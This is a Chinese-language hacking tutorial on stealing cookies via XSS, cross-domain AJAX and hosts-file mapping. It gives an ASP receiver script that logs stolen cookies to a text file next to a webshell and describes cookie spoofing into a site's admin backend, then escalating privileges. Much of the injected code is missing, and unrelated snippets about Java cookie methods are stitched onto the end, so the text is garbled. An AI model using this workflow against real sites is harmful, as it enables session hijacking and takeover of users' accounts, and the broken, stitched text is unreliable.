1.xss跨站盜cookie
2.ajax跨域盜cookie
3.hosts檔案對映
對於第一種方法,首先:在有跨站漏洞的頁面貼上跨站**如:
//意思是接收客戶端使用者的cookie併發送到delcookie.asp這個頁面進行處理,處理的結果是通過delcookie.asp這個頁面將客戶端的cookie寫入乙個叫cookie.txt的檔案中,從而實現目的!
然後,在webshell與delcookie.asp同目錄之下建立乙個cookie.txt檔案接收cookie!
最後,通過cookie欺騙登入**後台!進而對**提權,呵呵~
delcookie.asp**:
xxmsg = request("msg") //獲取提交過來的msg變數,也就是
cookie值
set fs = server.createobject("scripting.filesystemobject")
建立乙個fs物件
set thisfile = fs.opentextfile(testfile,8,true,0)
thisfile.writeline(""&msg&"")//像code.txt中寫入獲取來的
cookie
thisfile.close //關閉
set fs = nothing
%>
對於第二種方法,
利用ajax盜取cookie的難題解決:
第乙個難題是ajax跨域提交資料,可以用web**來解決,上的a.htm**:
這樣直接訪問/a.htm是可以成功傳送資料的。但是在跨站中,假如我們要跨192.168.8.108的站,這樣來講肯定不能讓我們放乙個web.asp在上邊的,所以這種辦法不可行。
另外,其它的ie7.0下跨站想盜取cookie一般都會用到iframe標籤,在沒有研究成功ajax傳送的情況下,經過搜尋發現了另一種跨站的思路,不需要用iframe來跨域提交,**:
對於第三種方法,
採取的原理是:hosts檔案的優先順序比dns伺服器的優先順序高!
Java中Cookie裡的方法總結
cookie中的方法有 void setcomment string purpose 設定cookie中注釋。void setdomain string pattern 設定cookie中cookie適用的網域名稱 void setmaxage int expiry 以秒計算,設定cookie過期時...
關於cookie總結
徹底理解cookie,session,token 這篇介紹的很詳細和清楚 原生js操作cookie 基礎 官方說明 js cookie 的github位址 npm安裝js cookie import cookies from js cookie 設定cookie cookies.set name v...
Cookie學習總結
一 會話 一般儲存會話的方法分為兩種 一種為cookie另一種為session 二 cookie儲存會話資料 cookie 常用方法 cookie string,value cookie usernamecookie new cookie username schoolid,encodedusern...